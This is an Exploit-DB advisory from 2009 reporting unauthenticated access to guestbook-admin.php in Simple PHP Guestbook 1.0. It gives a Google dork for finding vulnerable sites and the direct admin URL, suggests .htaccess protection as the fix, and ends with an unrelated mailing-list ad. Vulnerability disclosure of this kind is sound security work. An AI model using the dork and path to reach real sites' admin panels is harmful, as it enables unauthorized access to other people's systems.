Simple PHP Guestbook - Remote Admin Access

EDB-ID:

10666

CVE:

N/A

Author:

Sora

Type:

webapps

Platform:

PHP

Published:

2009-12-25

# Vendor: http://www.simplephpguestbook.com/
# Version: 1.0
# Tested on: Windows and Linux
--------------------------------------
> Simple PHP Guestbook Remote Admin Access Exploit
> Created by Sora
> [+] contact: vhr95zw [at] hotmail.com

Description:
Simple PHP Guestbook suffers an remote access in the guestbook admin file guestbook-admin.php.

Solution(s):
Add guestbook-admin.php to your .htaccess file.

# Google Dork: "Copyright (c) 2004-2006 by Simple PHP Guestbook"
# Code: http://www.site.com/guestbook-admin.php
________________________________
Get Windows 7 for only $39.99-CDN College or University students only. This offer ends Jan 3-upgrade now!<http://go.microsoft.com/?linkid=9691814>